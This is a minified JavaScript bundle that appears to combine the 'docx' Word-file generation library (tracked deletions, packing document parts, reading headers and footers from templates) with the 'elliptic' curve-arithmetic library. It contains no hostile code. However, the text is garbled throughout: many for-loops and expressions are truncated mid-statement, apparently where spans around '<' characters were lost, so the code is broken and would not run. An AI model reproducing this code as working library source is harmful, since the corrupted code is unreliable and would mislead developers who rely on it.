E{constructor(Ce){super("w:ins"),this.root.push(new Ke({id:Ce.id,author:Ce.author,date:Ce.date})),this.addChildElement(new vt(Ce))}}class BM extends E{constructor(){super("w:delInstrText"),this.root.push(new Be({space:ee.PRESERVE})),this.root.push("PAGE")}}class yC extends E{constructor(){super("w:delInstrText"),this.root.push(new Be({space:ee.PRESERVE})),this.root.push("NUMPAGES")}}class ac extends E{constructor(){super("w:delInstrText"),this.root.push(new Be({space:ee.PRESERVE})),this.root.push("SECTIONPAGES")}}class Wc extends E{constructor(Ce){super("w:delText"),this.root.push(new Be({space:ee.PRESERVE})),this.root.push(Ce)}}class P_ extends E{constructor(Ce){super("w:del"),this.root.push(new Ke({id:Ce.id,author:Ce.author,date:Ce.date})),this.deletedTextRunWrapper=new rh(Ce),this.addChildElement(this.deletedTextRunWrapper)}}class rh extends E{constructor(Ce){if(super("w:r"),this.root.push(new $e(Ce)),Ce.children)for(const nt of Ce.children)if("string"!=typeof nt)this.root.push(nt);else switch(nt){case ye.CURRENT:this.root.push(new Ue),this.root.push(new BM),this.root.push(new Xe),this.root.push(new He);break;case ye.TOTAL_PAGES:this.root.push(new Ue),this.root.push(new yC),this.root.push(new Xe),this.root.push(new He);break;case ye.TOTAL_PAGES_IN_SECTION:this.root.push(new Ue),this.root.push(new ac),this.root.push(new Xe),this.root.push(new He);break;default:this.root.push(new Wc(nt))}else Ce.text&&this.root.push(new Wc(Ce.text));if(Ce.break)for(let nt=0;nt{di=di.replace(new RegExp(`{${pi.fileName}}`,"g"),(Dt+Hi).toString())}),di}getMediaData(Ce,nt){return nt.Array.filter(Dt=>Ce.search(`{${Dt.fileName}}`)>0)}}class _s{replace(Ce,nt){let Dt=Ce;for(const di of nt)Dt=Dt.replace(new RegExp(`{${di.reference}-${di.instance}}`,"g"),di.numId.toString());return Dt}}var ch,Cl=function(Se,Ce,nt,Dt){return new(nt||(nt=Promise))(function(di,pi){function Hi(ca){try{Ya(Dt.next(ca))}catch(ka){pi(ka)}}function _a(ca){try{Ya(Dt.throw(ca))}catch(ka){pi(ka)}}function Ya(ca){var ka;ca.done?di(ca.value):(ka=ca.value,ka instanceof nt?ka:new nt(function(Dr){Dr(ka)})).then(Hi,_a)}Ya((Dt=Dt.apply(Se,Ce||[])).next())})};!function(Se){Se.NONE="",Se.WITH_2_BLANKS=" ",Se.WITH_4_BLANKS=" ",Se.WITH_TAB="\t"}(ch||(ch={}));class L_{static toString(Ce,nt){return Cl(this,void 0,void 0,function*(){return yield this.compiler.compile(Ce,nt).generateAsync({type:"string",mimeType:"application/vnd.openxmlformats-officedocument.wordprocessingml.document",compression:"DEFLATE"})})}static toBuffer(Ce,nt){return Cl(this,void 0,void 0,function*(){return yield this.compiler.compile(Ce,nt).generateAsync({type:"nodebuffer",mimeType:"application/vnd.openxmlformats-officedocument.wordprocessingml.document",compression:"DEFLATE"})})}static toBase64String(Ce,nt){return Cl(this,void 0,void 0,function*(){return yield this.compiler.compile(Ce,nt).generateAsync({type:"base64",mimeType:"application/vnd.openxmlformats-officedocument.wordprocessingml.document",compression:"DEFLATE"})})}static toBlob(Ce,nt){return Cl(this,void 0,void 0,function*(){return yield this.compiler.compile(Ce,nt).generateAsync({type:"blob",mimeType:"application/vnd.openxmlformats-officedocument.wordprocessingml.document",compression:"DEFLATE"})})}static toStream(Ce,nt){return this.compiler.compile(Ce,nt).generateNodeStream({type:"nodebuffer",streamFiles:!0,mimeType:"application/vnd.openxmlformats-officedocument.wordprocessingml.document",compression:"DEFLATE"})}}L_.compiler=new class{constructor(){this.formatter=new HM,this.imageReplacer=new sh,this.numberingReplacer=new _s}compile(Se,Ce){const nt=new N_,Dt=this.xmlifyFile(Se,Ce),di=new Map(Object.entries(Dt));for(const[,pi]of di)if(Array.isArray(pi))for(const Hi of pi)nt.file(Hi.path,Hi.data);else nt.file(pi.path,pi.data);for(const pi of Se.Media.Array)nt.file(`word/media/${pi.fileName}`,pi.stream);return nt}xmlifyFile(Se,Ce){const nt=Se.Document.Relationships.RelationshipCount+1,Dt=Br(this.formatter.format(Se.Document.View,{viewWrapper:Se.Document,file:Se}),{indent:Ce,declaration:{standalone:"yes",encoding:"UTF-8"}}),di=this.imageReplacer.getMediaData(Dt,Se.Media);return{Relationships:{data:(()=>(di.forEach((pi,Hi)=>{Se.Document.Relationships.createRelationship(nt+Hi,"http://schemas.openxmlformats.org/officeDocument/2006/relationships/image",`media/${pi.fileName}`)}),Br(this.formatter.format(Se.Document.Relationships,{viewWrapper:Se.Document,file:Se}),{indent:Ce,declaration:{encoding:"UTF-8"}})))(),path:"word/_rels/document.xml.rels"},Document:{data:(()=>{const pi=this.imageReplacer.replace(Dt,di,nt);return this.numberingReplacer.replace(pi,Se.Numbering.ConcreteNumbering)})(),path:"word/document.xml"},Styles:{data:(()=>{const pi=Br(this.formatter.format(Se.Styles,{viewWrapper:Se.Document,file:Se}),{indent:Ce,declaration:{standalone:"yes",encoding:"UTF-8"}});return this.numberingReplacer.replace(pi,Se.Numbering.ConcreteNumbering)})(),path:"word/styles.xml"},Properties:{data:Br(this.formatter.format(Se.CoreProperties,{viewWrapper:Se.Document,file:Se}),{indent:Ce,declaration:{standalone:"yes",encoding:"UTF-8"}}),path:"docProps/core.xml"},Numbering:{data:Br(this.formatter.format(Se.Numbering,{viewWrapper:Se.Document,file:Se}),{indent:Ce,declaration:{standalone:"yes",encoding:"UTF-8"}}),path:"word/numbering.xml"},FileRelationships:{data:Br(this.formatter.format(Se.FileRelationships,{viewWrapper:Se.Document,file:Se}),{indent:Ce,declaration:{encoding:"UTF-8"}}),path:"_rels/.rels"},HeaderRelationships:Se.Headers.map((pi,Hi)=>{const _a=Br(this.formatter.format(pi.View,{viewWrapper:pi,file:Se}),{indent:Ce,declaration:{encoding:"UTF-8"}});return this.imageReplacer.getMediaData(_a,Se.Media).forEach((Ya,ca)=>{pi.Relationships.createRelationship(ca,"http://schemas.openxmlformats.org/officeDocument/2006/relationships/image",`media/${Ya.fileName}`)}),{data:Br(this.formatter.format(pi.Relationships,{viewWrapper:pi,file:Se}),{indent:Ce,declaration:{encoding:"UTF-8"}}),path:`word/_rels/header${Hi+1}.xml.rels`}}),FooterRelationships:Se.Footers.map((pi,Hi)=>{const _a=Br(this.formatter.format(pi.View,{viewWrapper:pi,file:Se}),{indent:Ce,declaration:{encoding:"UTF-8"}});return this.imageReplacer.getMediaData(_a,Se.Media).forEach((Ya,ca)=>{pi.Relationships.createRelationship(ca,"http://schemas.openxmlformats.org/officeDocument/2006/relationships/image",`media/${Ya.fileName}`)}),{data:Br(this.formatter.format(pi.Relationships,{viewWrapper:pi,file:Se}),{indent:Ce,declaration:{encoding:"UTF-8"}}),path:`word/_rels/footer${Hi+1}.xml.rels`}}),Headers:Se.Headers.map((pi,Hi)=>{const _a=Br(this.formatter.format(pi.View,{viewWrapper:pi,file:Se}),{indent:Ce,declaration:{encoding:"UTF-8"}}),Ya=this.imageReplacer.getMediaData(_a,Se.Media),ca=this.imageReplacer.replace(_a,Ya,0);return{data:this.numberingReplacer.replace(ca,Se.Numbering.ConcreteNumbering),path:`word/header${Hi+1}.xml`}}),Footers:Se.Footers.map((pi,Hi)=>{const _a=Br(this.formatter.format(pi.View,{viewWrapper:pi,file:Se}),{indent:Ce,declaration:{encoding:"UTF-8"}}),Ya=this.imageReplacer.getMediaData(_a,Se.Media),ca=this.imageReplacer.replace(_a,Ya,0);return{data:this.numberingReplacer.replace(ca,Se.Numbering.ConcreteNumbering),path:`word/footer${Hi+1}.xml`}}),ContentTypes:{data:Br(this.formatter.format(Se.ContentTypes,{viewWrapper:Se.Document,file:Se}),{indent:Ce,declaration:{encoding:"UTF-8"}}),path:"[Content_Types].xml"},CustomProperties:{data:Br(this.formatter.format(Se.CustomProperties,{viewWrapper:Se.Document,file:Se}),{indent:Ce,declaration:{standalone:"yes",encoding:"UTF-8"}}),path:"docProps/custom.xml"},AppProperties:{data:Br(this.formatter.format(Se.AppProperties,{viewWrapper:Se.Document,file:Se}),{indent:Ce,declaration:{standalone:"yes",encoding:"UTF-8"}}),path:"docProps/app.xml"},FootNotes:{data:Br(this.formatter.format(Se.FootNotes.View,{viewWrapper:Se.FootNotes,file:Se}),{indent:Ce,declaration:{encoding:"UTF-8"}}),path:"word/footnotes.xml"},FootNotesRelationships:{data:Br(this.formatter.format(Se.FootNotes.Relationships,{viewWrapper:Se.FootNotes,file:Se}),{indent:Ce,declaration:{encoding:"UTF-8"}}),path:"word/_rels/footnotes.xml.rels"},Settings:{data:Br(this.formatter.format(Se.Settings,{viewWrapper:Se.Document,file:Se}),{indent:Ce,declaration:{standalone:"yes",encoding:"UTF-8"}}),path:"word/settings.xml"},Comments:{data:Br(this.formatter.format(Se.Comments,{viewWrapper:Se.Document,file:Se}),{indent:Ce,declaration:{standalone:"yes",encoding:"UTF-8"}}),path:"word/comments.xml"}}}};var fd=function(Se,Ce,nt,Dt){return new(nt||(nt=Promise))(function(di,pi){function Hi(ca){try{Ya(Dt.next(ca))}catch(ka){pi(ka)}}function _a(ca){try{Ya(Dt.throw(ca))}catch(ka){pi(ka)}}function Ya(ca){var ka;ca.done?di(ca.value):(ka=ca.value,ka instanceof nt?ka:new nt(function(Dr){Dr(ka)})).then(Hi,_a)}Ya((Dt=Dt.apply(Se,Ce||[])).next())})};const N0={"http://schemas.openxmlformats.org/officeDocument/2006/relationships/header":"header","http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer":"footer","http://schemas.openxmlformats.org/officeDocument/2006/relationships/image":"image","http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink":"hyperlink"};var lh;!function(Se){Se.HEADER="header",Se.FOOTER="footer",Se.IMAGE="image",Se.HYPERLINK="hyperlink"}(lh||(lh={}));class bC{extract(Ce){return fd(this,void 0,void 0,function*(){const nt=yield N_.loadAsync(Ce),Dt=yield nt.files["word/document.xml"].async("text"),di=yield nt.files["word/_rels/document.xml.rels"].async("text"),pi=this.extractDocumentRefs(Dt),Hi=this.findReferenceFiles(di),_a=new dd;return{headers:yield this.createHeaders(nt,pi,Hi,_a,0),footers:yield this.createFooters(nt,pi,Hi,_a,pi.headers.length),currentRelationshipId:pi.footers.length+pi.headers.length,styles:yield nt.files["word/styles.xml"].async("text"),titlePageIsDefined:this.checkIfTitlePageIsDefined(Dt),media:_a}})}createFooters(Ce,nt,Dt,di,pi){return fd(this,void 0,void 0,function*(){const Hi=nt.footers.map((_a,Ya)=>fd(this,void 0,void 0,function*(){const ca=Dt.find(At=>At.id===_a.id);if(null===ca||!ca)throw new Error(`Can not find target file for id ${_a.id}`);const ka=yield Ce.files[`word/${ca.target}`].async("text"),Dr=(0,y.xml2js)(ka,{compact:!1,captureSpacesBetweenElements:!0});if(!Dr.elements)return;const Ao=Dr.elements.reduce((At,gc)=>"w:ftr"===gc.name?gc:At),sr=A(Ao),Fc=new hl(di,pi+Ya,sr);return yield this.addRelationshipToWrapper(ca,Ce,Fc,di),{type:_a.type,footer:Fc}})).filter(_a=>!!_a);return Promise.all(Hi)})}createHeaders(Ce,nt,Dt,di,pi){return fd(this,void 0,void 0,function*(){const Hi=nt.headers.map((_a,Ya)=>fd(this,void 0,void 0,function*(){const ca=Dt.find(At=>At.id===_a.id);if(null===ca||!ca)throw new Error(`Can not find target file for id ${_a.id}`);const ka=yield Ce.files[`word/${ca.target}`].async("text"),Dr=(0,y.xml2js)(ka,{compact:!1,captureSpacesBetweenElements:!0});if(!Dr.elements)return;const Ao=Dr.elements.reduce((At,gc)=>"w:hdr"===gc.name?gc:At),sr=A(Ao),Fc=new pl(di,pi+Ya,sr);return yield this.addRelationshipToWrapper(ca,Ce,Fc,di),{type:_a.type,header:Fc}})).filter(_a=>!!_a);return Promise.all(Hi)})}addRelationshipToWrapper(Ce,nt,Dt,di){return fd(this,void 0,void 0,function*(){const pi=nt.files[`word/_rels/${Ce.target}.rels`];if(!pi)return;const Hi=yield pi.async("text"),_a=this.findReferenceFiles(Hi).filter(ca=>ca.type===lh.IMAGE),Ya=this.findReferenceFiles(Hi).filter(ca=>ca.type===lh.HYPERLINK);for(const ca of _a){const ka=N_.support.arraybuffer?"arraybuffer":"nodebuffer",Dr=yield nt.files[`word/${ca.target}`].async(ka),Ao=di.addMedia(Dr,{width:100,height:100});Dt.Relationships.createRelationship(ca.id,"http://schemas.openxmlformats.org/officeDocument/2006/relationships/image",`media/${Ao.fileName}`)}for(const ca of Ya)Dt.Relationships.createRelationship(ca.id,"http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink",ca.target,ti.EXTERNAL)})}findReferenceFiles(Ce){const nt=(0,y.xml2js)(Ce,{compact:!0});return(Array.isArray(nt.Relationships.Relationship)?nt.Relationships.Relationship:[nt.Relationships.Relationship]).map(Dt=>{if(void 0===Dt._attributes)throw Error("relationship element has no attributes");return{id:this.parseRefId(Dt._attributes.Id),type:N0[Dt._attributes.Type],target:Dt._attributes.Target}}).filter(Dt=>null!==Dt.type)}extractDocumentRefs(Ce){const nt=(0,y.xml2js)(Ce,{compact:!0})["w:document"]["w:body"]["w:sectPr"],Dt=nt["w:headerReference"];let di;di=void 0===Dt?[]:Array.isArray(Dt)?Dt:[Dt];const pi=di.map(Ya=>{if(void 0===Ya._attributes)throw Error("header reference element has no attributes");return{type:Ya._attributes["w:type"],id:this.parseRefId(Ya._attributes["r:id"])}}),Hi=nt["w:footerReference"];let _a;return _a=void 0===Hi?[]:Array.isArray(Hi)?Hi:[Hi],{headers:pi,footers:_a.map(Ya=>{if(void 0===Ya._attributes)throw Error("footer reference element has no attributes");return{type:Ya._attributes["w:type"],id:this.parseRefId(Ya._attributes["r:id"])}})}}checkIfTitlePageIsDefined(Ce){return void 0!==(0,y.xml2js)(Ce,{compact:!0})["w:document"]["w:body"]["w:sectPr"]["w:titlePg"]}parseRefId(Ce){const nt=/^rId(\d+)$/.exec(Ce);if(null===nt)throw new Error("Invalid ref id");return parseInt(nt[1],10)}}var ir=ae(5575)})(),I})(),Pe.exports=Q()},1875:(Pe,we,de)=>{"use strict";var ie=we;ie.version=de(193).i8,ie.utils=de(7e3),ie.rand=de(9598),ie.curve=de(6186),ie.curves=de(1915),ie.ec=de(7949),ie.eddsa=de(8593)},3654:(Pe,we,de)=>{"use strict";var ie=de(1959),j=de(7e3),Q=j.getNAF,ae=j.getJSF,I=j.assert;function $(E,C){this.type=E,this.p=new ie(C.p,16),this.red=C.prime?ie.red(C.prime):ie.mont(this.p),this.zero=new ie(0).toRed(this.red),this.one=new ie(1).toRed(this.red),this.two=new ie(2).toRed(this.red),this.n=C.n&&new ie(C.n,16),this.g=C.g&&this.pointFromJSON(C.g,C.gRed),this._wnafT1=new Array(4),this._wnafT2=new Array(4),this._wnafT3=new Array(4),this._wnafT4=new Array(4),this._bitLength=this.n?this.n.bitLength():0;var b=this.n&&this.p.div(this.n);!b||b.cmpn(100)>0?this.redN=null:(this._maxwellTrick=!0,this.redN=this.n.toRed(this.red))}function U(E,C){this.curve=E,this.type=C,this.precomputed=null}Pe.exports=$,$.prototype.point=function(){throw new Error("Not implemented")},$.prototype.validate=function(){throw new Error("Not implemented")},$.prototype._fixedNafMul=function(C,b){I(C.precomputed);var _=C._getDoubles(),y=Q(b,1,this._bitLength),A=(1<<_.step+1)-(_.step%2==0?2:1);A/=3;var D,w,p=[];for(D=0;D=D;x--)w=(w<<1)+y[x];p.push(w)}for(var S=this.jpoint(null,null,null),O=this.jpoint(null,null,null),B=A;B>0;B--){for(D=0;D=0;w--){for(var x=0;w>=0&&0===p[w];w--)x++;if(w>=0&&x++,D=D.dblp(x),w<0)break;var S=p[w];I(0!==S),D="affine"===C.type?D.mixedAdd(S>0?A[S-1>>1]:A[-S-1>>1].neg()):D.add(S>0?A[S-1>>1]:A[-S-1>>1].neg())}return"affine"===C.type?D.toP():D},$.prototype._wnafMulAdd=function(C,b,_,y,A){var S,O,B,p=this._wnafT1,D=this._wnafT2,w=this._wnafT3,x=0;for(S=0;S=1;S-=2){var ee=S-1,se=S;if(1===p[ee]&&1===p[se]){var ve=[b[ee],null,null,b[se]];0===b[ee].y.cmp(b[se].y)?(ve[1]=b[ee].add(b[se]),ve[2]=b[ee].toJ().mixedAdd(b[se].neg())):0===b[ee].y.cmp(b[se].y.redNeg())?(ve[1]=b[ee].toJ().mixedAdd(b[se]),ve[2]=b[ee].add(b[se].neg())):(ve[1]=b[ee].toJ().mixedAdd(b[se]),ve[2]=b[ee].toJ().mixedAdd(b[se].neg()));var le=[-3,-1,-5,-7,0,7,5,1,3],ye=ae(_[ee],_[se]);for(x=Math.max(ye[0].length,x),w[ee]=new Array(x),w[se]=new Array(x),O=0;O=0;S--){for(var M=0;S>=0;){var P=!0;for(O=0;O=0&&M++,f=f.dblp(M),S<0)break;for(O=0;O0?B=D[O][G-1>>1]:G<0&&(B=D[O][-G-1>>1].neg()),f="affine"===B.type?f.mixedAdd(B):f.add(B))}}for(S=0;S=Math.ceil((C.bitLength()+1)/b.step)},U.prototype._getDoubles=function(C,b){if(this.precomputed&&this.precomputed.doubles)return this.precomputed.doubles;for(var _=[this],y=this,A=0;A{"use strict";var ie=de(7e3),j=de(1959),Q=de(2270),ae=de(3654),I=ie.assert;function $(E){this.twisted=1!=(0|E.a),this.mOneA=this.twisted&&-1==(0|E.a),this.extended=this.mOneA,ae.call(this,"edwards",E),this.a=new j(E.a,16).umod(this.red.m),this.a=this.a.toRed(this.red),this.c=new j(E.c,16).toRed(this.red),this.c2=this.c.redSqr(),this.d=new j(E.d,16).toRed(this.red),this.dd=this.d.redAdd(this.d),I(!this.twisted||0===this.c.fromRed().cmpn(1)),this.oneC=1==(0|E.c)}function U(E,C,b,_,y){ae.BasePoint.call(this,E,"projective"),null===C&&null===b&&null===_?(this.x=this.curve.zero,this.y=this.curve.one,this.z=this.curve.one,this.t=this.curve.zero,this.zOne=!0):(this.x=new j(C,16),this.y=new j(b,16),this.z=_?new j(_,16):this.curve.one,this.t=y&&new j(y,16),this.x.red||(this.x=this.x.toRed(this.curve.red)),this.y.red||(this.y=this.y.toRed(this.curve.red)),this.z.red||(this.z=this.z.toRed(this.curve.red)),this.t&&!this.t.red&&(this.t=this.t.toRed(this.curve.red)),this.zOne=this.z===this.curve.one,this.curve.extended&&!this.t&&(this.t=this.x.redMul(this.y),this.zOne||(this.t=this.t.redMul(this.z.redInvm()))))}Q($,ae),Pe.exports=$,$.prototype._mulA=function(C){return this.mOneA?C.redNeg():this.a.redMul(C)},$.prototype._mulC=function(C){return this.oneC?C:this.c.redMul(C)},$.prototype.jpoint=function(C,b,_,y){return this.point(C,b,_,y)},$.prototype.pointFromX=function(C,b){(C=new j(C,16)).red||(C=C.toRed(this.red));var _=C.redSqr(),y=this.c2.redSub(this.a.redMul(_)),A=this.one.redSub(this.c2.redMul(this.d).redMul(_)),p=y.redMul(A.redInvm()),D=p.redSqrt();if(0!==D.redSqr().redSub(p).cmp(this.zero))throw new Error("invalid point");var w=D.fromRed().isOdd();return(b&&!w||!b&&w)&&(D=D.redNeg()),this.point(C,D)},$.prototype.pointFromY=function(C,b){(C=new j(C,16)).red||(C=C.toRed(this.red));var _=C.redSqr(),y=_.redSub(this.c2),A=_.redMul(this.d).redMul(this.c2).redSub(this.a),p=y.redMul(A.redInvm());if(0===p.cmp(this.zero)){if(b)throw new Error("invalid point");return this.point(this.zero,C)}var D=p.redSqrt();if(0!==D.redSqr().redSub(p).cmp(this.zero))throw new Error("invalid point");return D.fromRed().isOdd()!==b&&(D=D.redNeg()),this.point(D,C)},$.prototype.validate=function(C){if(C.isInfinity())return!0;C.normalize();var b=C.x.redSqr(),_=C.y.redSqr(),y=b.redMul(this.a).redAdd(_),A=this.c2.redMul(this.one.redAdd(this.d.redMul(b).redMul(_)));return 0===y.cmp(A)},Q(U,ae.BasePoint),$.prototype.pointFromJSON=function(C){return U.fromJSON(this,C)},$.prototype.point=function(C,b,_,y){return new U(this,C,b,_,y)},U.fromJSON=function(C,b){return new U(C,b[0],b[1],b[2])},U.prototype.inspect=function(){return this.isInfinity()?"":""},U.prototype.isInfinity=function(){return 0===this.x.cmpn(0)&&(0===this.y.cmp(this.z)||this.zOne&&0===this.y.cmp(this.curve.c))},U.prototype._extDbl=function(){var C=this.x.redSqr(),b=this.y.redSqr(),_=this.z.redSqr();_=_.redIAdd(_);var y=this.curve._mulA(C),A=this.x.redAdd(this.y).redSqr().redISub(C).redISub(b),p=y.redAdd(b),D=p.redSub(_),w=y.redSub(b),x=A.redMul(D),S=p.redMul(w),O=A.redMul(w),B=D.redMul(p);return this.curve.point(x,S,B,O)},U.prototype._projDbl=function(){var y,A,p,D,w,x,C=this.x.redAdd(this.y).redSqr(),b=this.x.redSqr(),_=this.y.redSqr();if(this.curve.twisted){var S=(D=this.curve._mulA(b)).redAdd(_);this.zOne?(y=C.redSub(b).redSub(_).redMul(S.redSub(this.curve.two)),A=S.redMul(D.redSub(_)),p=S.redSqr().redSub(S).redSub(S)):(w=this.z.redSqr(),x=S.redSub(w).redISub(w),y=C.redSub(b).redISub(_).redMul(x),A=S.redMul(D.redSub(_)),p=S.redMul(x))}else D=b.redAdd(_),w=this.curve._mulC(this.z).redSqr(),x=D.redSub(w).redSub(w),y=this.curve._mulC(C.redISub(D)).redMul(x),A=this.curve._mulC(D).redMul(b.redISub(_)),p=D.redMul(x);return this.curve.point(y,A,p)},U.prototype.dbl=function(){return this.isInfinity()?this:this.curve.extended?this._extDbl():this._projDbl()},U.prototype._extAdd=function(C){var b=this.y.redSub(this.x).redMul(C.y.redSub(C.x)),_=this.y.redAdd(this.x).redMul(C.y.redAdd(C.x)),y=this.t.redMul(this.curve.dd).redMul(C.t),A=this.z.redMul(C.z.redAdd(C.z)),p=_.redSub(b),D=A.redSub(y),w=A.redAdd(y),x=_.redAdd(b),S=p.redMul(D),O=w.redMul(x),B=p.redMul(x),K=D.redMul(w);return this.curve.point(S,O,K,B)},U.prototype._projAdd=function(C){var O,B,b=this.z.redMul(C.z),_=b.redSqr(),y=this.x.redMul(C.x),A=this.y.redMul(C.y),p=this.curve.d.redMul(y).redMul(A),D=_.redSub(p),w=_.redAdd(p),x=this.x.redAdd(this.y).redMul(C.x.redAdd(C.y)).redISub(y).redISub(A),S=b.redMul(D).redMul(x);return this.curve.twisted?(O=b.redMul(w).redMul(A.redSub(this.curve._mulA(y))),B=D.redMul(w)):(O=b.redMul(w).redMul(A.redSub(y)),B=this.curve._mulC(D).redMul(w)),this.curve.point(S,O,B)},U.prototype.add=function(C){return this.isInfinity()?C:C.isInfinity()?this:this.curve.extended?this._extAdd(C):this._projAdd(C)},U.prototype.mul=function(C){return this._hasDoubles(C)?this.curve._fixedNafMul(this,C):this.curve._wnafMul(this,C)},U.prototype.mulAdd=function(C,b,_){return this.curve._wnafMulAdd(1,[this,b],[C,_],2,!1)},U.prototype.jmulAdd=function(C,b,_){return this.curve._wnafMulAdd(1,[this,b],[C,_],2,!0)},U.prototype.normalize=function(){if(this.zOne)return this;var C=this.z.redInvm();return this.x=this.x.redMul(C),this.y=this.y.redMul(C),this.t&&(this.t=this.t.redMul(C)),this.z=this.curve.one,this.zOne=!0,this},U.prototype.neg=function(){return this.curve.point(this.x.redNeg(),this.y,this.z,this.t&&this.t.redNeg())},U.prototype.getX=function(){return this.normalize(),this.x.fromRed()},U.prototype.getY=function(){return this.normalize(),this.y.fromRed()},U.prototype.eq=function(C){return this===C||0===this.getX().cmp(C.getX())&&0===this.getY().cmp(C.getY())},U.prototype.eqXToP=function(C){var b=C.toRed(this.curve.red).redMul(this.z);if(0===this.x.cmp(b))return!0;for(var _=C.clone(),y=this.curve.redN.redMul(this.z);;){if(_.iadd(this.curve.n),_.cmp(this.curve.p)>=0)return!1;if(b.redIAdd(y),0===this.x.cmp(b))return!0}},U.prototype.toP=U.prototype.normalize,U.prototype.mixedAdd=U.prototype.add},6186:(Pe,we,de)=>{"use strict";var ie=we;ie.base=de(3654),ie.short=de(396),ie.mont=de(8217),ie.edwards=de(6718)},8217:(Pe,we,de)=>{"use strict";var ie=de(1959),j=de(2270),Q=de(3654),ae=de(7e3);function I(U){Q.call(this,"mont",U),this.a=new ie(U.a,16).toRed(this.red),this.b=new ie(U.b,16).toRed(this.red),this.i4=new ie(4).toRed(this.red).redInvm(),this.two=new ie(2).toRed(this.red),this.a24=this.i4.redMul(this.a.redAdd(this.two))}function $(U,E,C){Q.BasePoint.call(this,U,"projective"),null===E&&null===C?(this.x=this.curve.one,this.z=this.curve.zero):(this.x=new ie(E,16),this.z=new ie(C,16),this.x.red||(this.x=this.x.toRed(this.curve.red)),this.z.red||(this.z=this.z.toRed(this.curve.red)))}j(I,Q),Pe.exports=I,I.prototype.validate=function(E){var C=E.normalize().x,b=C.redSqr(),_=b.redMul(C).redAdd(b.redMul(this.a)).redAdd(C);return 0===_.redSqrt().redSqr().cmp(_)},j($,Q.BasePoint),I.prototype.decodePoint=function(E,C){return this.point(ae.toArray(E,C),1)},I.prototype.point=function(E,C){return new $(this,E,C)},I.prototype.pointFromJSON=function(E){return $.fromJSON(this,E)},$.prototype.precompute=function(){},$.prototype._encode=function(){return this.getX().toArray("be",this.curve.p.byteLength())},$.fromJSON=function(E,C){return new $(E,C[0],C[1]||E.one)},$.prototype.inspect=function(){return this.isInfinity()?"":""},$.prototype.isInfinity=function(){return 0===this.z.cmpn(0)},$.prototype.dbl=function(){var C=this.x.redAdd(this.z).redSqr(),_=this.x.redSub(this.z).redSqr(),y=C.redSub(_),A=C.redMul(_),p=y.redMul(_.redAdd(this.curve.a24.redMul(y)));return this.curve.point(A,p)},$.prototype.add=function(){throw new Error("Not supported on Montgomery curve")},$.prototype.diffAdd=function(E,C){var b=this.x.redAdd(this.z),_=this.x.redSub(this.z),y=E.x.redAdd(E.z),p=E.x.redSub(E.z).redMul(b),D=y.redMul(_),w=C.z.redMul(p.redAdd(D).redSqr()),x=C.x.redMul(p.redISub(D).redSqr());return this.curve.point(w,x)},$.prototype.mul=function(E){for(var C=E.clone(),b=this,_=this.curve.point(null,null),A=[];0!==C.cmpn(0);C.iushrn(1))A.push(C.andln(1));for(var p=A.length-1;p>=0;p--)0===A[p]?(b=b.diffAdd(_,this),_=_.dbl()):(_=b.diffAdd(_,this),b=b.dbl());return _},$.prototype.mulAdd=function(){throw new Error("Not supported on Montgomery curve")},$.prototype.jumlAdd=function(){throw new Error("Not supported on Montgomery curve")},$.prototype.eq=function(E){return 0===this.getX().cmp(E.getX())},$.prototype.normalize=function(){return this.x=this.x.redMul(this.z.redInvm()),this.z=this.curve.one,this},$.prototype.getX=function(){return this.normalize(),this.x.fromRed()}},396:(Pe,we,de)=>{"use strict";var ie=de(7e3),j=de(1959),Q=de(2270),ae=de(3654),I=ie.assert;function $(C){ae.call(this,"short",C),this.a=new j(C.a,16).toRed(this.red),this.b=new j(C.b,16).toRed(this.red),this.tinv=this.two.redInvm(),this.zeroA=0===this.a.fromRed().cmpn(0),this.threeA=0===this.a.fromRed().sub(this.p).cmpn(-3),this.endo=this._getEndomorphism(C),this._endoWnafT1=new Array(4),this._endoWnafT2=new Array(4)}function U(C,b,_,y){ae.BasePoint.call(this,C,"affine"),null===b&&null===_?(this.x=null,this.y=null,this.inf=!0):(this.x=new j(b,16),this.y=new j(_,16),y&&(this.x.forceRed(this.curve.red),this.y.forceRed(this.curve.red)),this.x.red||(this.x=this.x.toRed(this.curve.red)),this.y.red||(this.y=this.y.toRed(this.curve.red)),this.inf=!1)}function E(C,b,_,y){ae.BasePoint.call(this,C,"jacobian"),null===b&&null===_&&null===y?(this.x=this.curve.one,this.y=this.curve.one,this.z=new j(0)):(this.x=new j(b,16),this.y=new j(_,16),this.z=new j(y,16)),this.x.red||(this.x=this.x.toRed(this.curve.red)),this.y.red||(this.y=this.y.toRed(this.curve.red)),this.z.red||(this.z=this.z.toRed(this.curve.red)),this.zOne=this.z===this.curve.one}Q($,ae),Pe.exports=$,$.prototype._getEndomorphism=function(b){if(this.zeroA&&this.g&&this.n&&1===this.p.modn(3)){var _,y;if(b.beta)_=new j(b.beta,16).toRed(this.red);else{var A=this._getEndoRoots(this.p);_=(_=A[0].cmp(A[1])<0?A[0]:A[1]).toRed(this.red)}if(b.lambda)y=new j(b.lambda,16);else{var p=this._getEndoRoots(this.n);0===this.g.mul(p[0]).x.cmp(this.g.x.redMul(_))?y=p[0]:I(0===this.g.mul(y=p[1]).x.cmp(this.g.x.redMul(_)))}return{beta:_,lambda:y,basis:b.basis?b.basis.map(function(w){return{a:new j(w.a,16),b:new j(w.b,16)}}):this._getEndoBasis(y)}}},$.prototype._getEndoRoots=function(b){var _=b===this.p?this.red:j.mont(b),y=new j(2).toRed(_).redInvm(),A=y.redNeg(),p=new j(3).toRed(_).redNeg().redSqrt().redMul(y);return[A.redAdd(p).fromRed(),A.redSub(p).fromRed()]},$.prototype._getEndoBasis=function(b){for(var S,O,B,K,ee,se,ve,ye,z,_=this.n.ushrn(Math.floor(this.n.bitLength()/2)),y=b,A=this.n.clone(),p=new j(1),D=new j(0),w=new j(0),x=new j(1),le=0;0!==y.cmpn(0);){var l=A.div(y);ye=A.sub(l.mul(y)),z=w.sub(l.mul(p));var f=x.sub(l.mul(D));if(!B&&ye.cmp(_)<0)S=ve.neg(),O=p,B=ye.neg(),K=z;else if(B&&2==++le)break;ve=ye,A=y,y=ye,w=p,p=z,x=D,D=f}ee=ye.neg(),se=z;var v=B.sqr().add(K.sqr());return ee.sqr().add(se.sqr()).cmp(v)>=0&&(ee=S,se=O),B.negative&&(B=B.neg(),K=K.neg()),ee.negative&&(ee=ee.neg(),se=se.neg()),[{a:B,b:K},{a:ee,b:se}]},$.prototype._endoSplit=function(b){var 